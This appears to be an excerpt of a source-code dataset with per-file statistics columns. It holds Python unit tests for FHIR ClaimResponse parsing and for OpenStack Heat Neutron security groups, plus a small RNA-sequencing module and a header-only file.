self.assertEqual(inst.item[0].detail[1].subDetail[0].subDetailSequence, 1)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].amount.value, 30.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].amount.value, 24.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[1].subDetailSequence, 2)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].amount.value, 10.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].amount.value, 8.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[2].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].subDetail[2].subDetailSequence, 3)
self.assertEqual(inst.item[0].detail[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[2].adjudication[0].amount.value, 200.0)
self.assertEqual(inst.item[0].detail[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[2].adjudication[2].amount.value, 14.0)
self.assertEqual(inst.item[0].detail[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[2].detailSequence, 3)
self.assertEqual(inst.item[0].detail[2].noteNumber[0], 1)
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.adjustment.currency, "USD")
self.assertEqual(inst.payment.adjustment.value, 75.0)
self.assertEqual(inst.payment.adjustmentReason.coding[0].code, "a002")
self.assertEqual(inst.payment.adjustmentReason.coding[0].display, "Prior Overpayment")
self.assertEqual(inst.payment.adjustmentReason.coding[0].system, "http://terminology.hl7.org/CodeSystem/payment-adjustment-reason")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 107.0)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-16")
self.assertEqual(inst.payment.identifier.system, "http://thebenefitcompany.com/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201416-123456")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 1)
self.assertEqual(inst.processNote[0].text, "After hours surcharge declined")
self.assertEqual(inst.processNote[0].type, "display")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 235.4)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 182.0)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "vision")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse5(self):
inst = self.instantiate_from("claimresponse-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse5(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse5(inst2)
def implClaimResponse5(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim could not be processed")
self.assertEqual(inst.error[0].code.coding[0].code, "a002")
self.assertEqual(inst.error[0].code.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-error")
self.assertEqual(inst.error[0].detailSequence, 2)
self.assertEqual(inst.error[0].itemSequence, 3)
self.assertEqual(inst.formCode.coding[0].code, "2")
self.assertEqual(inst.formCode.coding[0].system, "http://terminology.hl7.org/CodeSystem/forms-codes")
self.assertEqual(inst.id, "R3501")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3501")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "error")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 1)
self.assertEqual(inst.processNote[0].text, "Invalid claim")
self.assertEqual(inst.processNote[0].type, "display")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse that demonstrates returning errors</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
| 73.018947
| 210
| 0.696517
| 4,513
| 34,684
| 5.348327
| 0.067583
| 0.246095
| 0.306998
| 0.123876
| 0.922401
| 0.912458
| 0.906078
| 0.876745
| 0.847413
| 0.822016
| 0
| 0.046546
| 0.135279
| 34,684
| 474
| 211
| 73.172996
| 0.758236
| 0.003431
| 0
| 0.463252
| 1
| 0.002227
| 0.141324
| 0.005614
| 0
| 0
| 0
| 0
| 0.895323
| 1
| 0.024499
| false
| 0
| 0.013363
| 0
| 0.042316
| 0.004454
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3591ce9245724bd3904c836c9e95042ce5a506db
| 324
|
py
|
Python
|
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
from copy import copy
#sbaas
from .stage01_rnasequencing_genesFpkmTracking_io import stage01_rnasequencing_genesFpkmTracking_io
#sbaas models
from .stage01_rnasequencing_genesFpkmTracking_postgresql_models import *
class stage01_rnasequencing_genesFpkmTracking_execute(stage01_rnasequencing_genesFpkmTracking_io):
pass;
| 40.5
| 98
| 0.904321
| 34
| 324
| 8.147059
| 0.382353
| 0.361011
| 0.66787
| 0.422383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033113
| 0.067901
| 324
| 8
| 99
| 40.5
| 0.884106
| 0.052469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
35bf551525187ed9a5c3be694ec4026e761e04b3
| 45
|
py
|
Python
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | 1
|
2020-06-02T09:54:24.000Z
|
2020-06-02T09:54:24.000Z
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:05:40.000Z
|
2022-02-10T01:06:06.000Z
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | null | null | null |
# User: sky
# DATE: 2019/10/23
# TIME: 下午5:18
| 15
| 18
| 0.622222
| 9
| 45
| 3.111111
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 0.177778
| 45
| 3
| 19
| 15
| 0.459459
| 0.866667
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea269aa22435ff1a7d5a52c8867507efeb8081ad
| 28,848
|
py
|
Python
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 1
|
2018-07-04T07:59:26.000Z
|
2018-07-04T07:59:26.000Z
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient.common import exceptions as neutron_exc
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.v2_0 import client as neutronclient
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine import scheduler
from heat.engine import stack as parser
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class SecurityGroupTest(common.HeatTestCase):
test_template = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
description: HTTP and SSH access
rules:
- port_range_min: 22
port_range_max: 22
remote_ip_prefix: 0.0.0.0/0
protocol: tcp
- port_range_min: 80
port_range_max: 80
protocol: tcp
remote_ip_prefix: 0.0.0.0/0
- remote_mode: remote_group_id
remote_group_id: wwww
protocol: tcp
- direction: egress
port_range_min: 22
port_range_max: 22
protocol: tcp
remote_ip_prefix: 10.0.1.0/24
- direction: egress
remote_mode: remote_group_id
remote_group_id: xxxx
- direction: egress
remote_mode: remote_group_id
'''
test_template_update = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
description: SSH access for private network
name: myrules
rules:
- port_range_min: 22
port_range_max: 22
remote_ip_prefix: 10.0.0.10/24
protocol: tcp
'''
test_template_validate = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
name: default
'''
def setUp(self):
super(SecurityGroupTest, self).setUp()
self.mockclient = mock.Mock(spec=neutronclient.Client)
self.patchobject(neutronclient, 'Client', return_value=self.mockclient)
def lookup(client, lookup_type, name, cmd_resource):
return name
self.patchobject(neutronV20, 'find_resourceid_by_name_or_id',
side_effect=lookup)
self.patchobject(neutron.NeutronClientPlugin, 'has_extension',
return_value=True)
def create_stack(self, templ):
t = template_format.parse(templ)
self.stack = self.parse_stack(t)
self.assertIsNone(self.stack.create())
return self.stack
def parse_stack(self, t):
stack_name = 'test_stack'
tmpl = template.Template(t)
stack = parser.Stack(utils.dummy_context(), stack_name, tmpl)
stack.store()
return stack
def assertResourceState(self, rsrc, ref_id, metadata=None):
metadata = metadata or {}
self.assertIsNone(rsrc.validate())
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.assertEqual(ref_id, rsrc.FnGetRefId())
self.assertEqual(metadata, dict(rsrc.metadata_get()))
def test_security_group(self):
show_created = {'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '80',
'id': 'cccc',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '80'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': None,
'id': 'dddd',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'eeee',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'ffff',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'gggg',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}],
'id': 'aaaa'}
}
# create script
sg_name = utils.PhysName('test_stack', 'the_sg')
self.mockclient.create_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [{
"direction": "egress",
"ethertype": "IPv4",
"id": "aaaa-1",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}, {
"direction": "egress",
"ethertype": "IPv6",
"id": "aaaa-2",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}],
'id': 'aaaa'
}
}
self.mockclient.create_security_group_rule.side_effect = [
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'bbbb'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'cccc'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'dddd'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'eeee'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'ffff'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'gggg'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'hhhh'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv6',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'iiii'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.0.10/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'jjjj'
}
},
]
self.mockclient.show_security_group.side_effect = [
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [{
"direction": "egress",
"ethertype": "IPv4",
"id": "aaaa-1",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}, {
"direction": "egress",
"ethertype": "IPv6",
"id": "aaaa-2",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}],
'id': 'aaaa'
}
},
show_created,
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [],
'id': 'aaaa'
}
},
show_created,
]
self.mockclient.delete_security_group_rule.return_value = None
# update script
self.mockclient.update_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'myrules',
'description': 'SSH access for private network',
'security_group_rules': [],
'id': 'aaaa'
}
}
# delete script
self.mockclient.delete_security_group.return_value = None
stack = self.create_stack(self.test_template)
sg = stack['the_sg']
self.assertResourceState(sg, 'aaaa')
updated_tmpl = template_format.parse(self.test_template_update)
updated_stack = utils.parse_stack(updated_tmpl)
stack.update(updated_stack)
stack.delete()
self.mockclient.create_security_group.assert_called_once_with({
'security_group': {
'name': sg_name,
'description': 'HTTP and SSH access'
}
})
self.mockclient.create_security_group_rule.assert_has_calls([
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'ethertype': 'IPv6',
'security_group_id': 'aaaa',
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.0.10/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
])
self.mockclient.show_security_group.assert_called_with('aaaa')
self.mockclient.delete_security_group_rule.assert_has_calls([
mock.call('aaaa-1'),
mock.call('aaaa-2'),
# update script
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
# delete script
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
])
self.mockclient.update_security_group.assert_called_once_with(
'aaaa',
{'security_group': {
'description': 'SSH access for private network',
'name': 'myrules'}}
)
self.mockclient.delete_security_group.assert_called_once_with('aaaa')
def test_security_group_exception(self):
# create script
sg_name = utils.PhysName('test_stack', 'the_sg')
self.mockclient.create_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [],
'id': 'aaaa'
}
}
self.mockclient.create_security_group_rule.side_effect = [
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
]
self.mockclient.show_security_group.side_effect = [
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [],
'id': 'aaaa'
}
},
# delete script
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '80',
'id': 'cccc',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '80'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': None,
'id': 'dddd',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'eeee',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'ffff',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': 'xxxx',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'gggg',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': 'aaaa',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}],
'id': 'aaaa'}
},
neutron_exc.NeutronClientException(status_code=404),
]
# delete script
self.mockclient.delete_security_group_rule.side_effect = (
neutron_exc.NeutronClientException(status_code=404))
self.mockclient.delete_security_group.side_effect = (
neutron_exc.NeutronClientException(status_code=404))
stack = self.create_stack(self.test_template)
sg = stack['the_sg']
self.assertResourceState(sg, 'aaaa')
scheduler.TaskRunner(sg.delete)()
sg.state_set(sg.CREATE, sg.COMPLETE, 'to delete again')
sg.resource_id = 'aaaa'
stack.delete()
self.mockclient.create_security_group.assert_called_once_with({
'security_group': {
'name': sg_name,
'description': 'HTTP and SSH access'
}
})
self.mockclient.create_security_group_rule.assert_has_calls([
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
])
self.mockclient.show_security_group.assert_called_with('aaaa')
self.mockclient.delete_security_group_rule.assert_has_calls([
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
])
self.mockclient.delete_security_group.assert_called_with('aaaa')
def test_security_group_validate(self):
stack = self.create_stack(self.test_template_validate)
sg = stack['the_sg']
ex = self.assertRaises(exception.StackValidationFailed, sg.validate)
self.assertEqual(
'Security groups cannot be assigned the name "default".',
ex.message)
| 37.032092
| 79
| 0.440342
| 2,345
| 28,848
| 5.116844
| 0.090405
| 0.11701
| 0.040337
| 0.063339
| 0.807317
| 0.800567
| 0.783315
| 0.754313
| 0.724644
| 0.718977
| 0
| 0.046115
| 0.446755
| 28,848
| 778
| 80
| 37.079692
| 0.705702
| 0.022809
| 0
| 0.774238
| 0
| 0
| 0.309132
| 0.033409
| 0
| 0
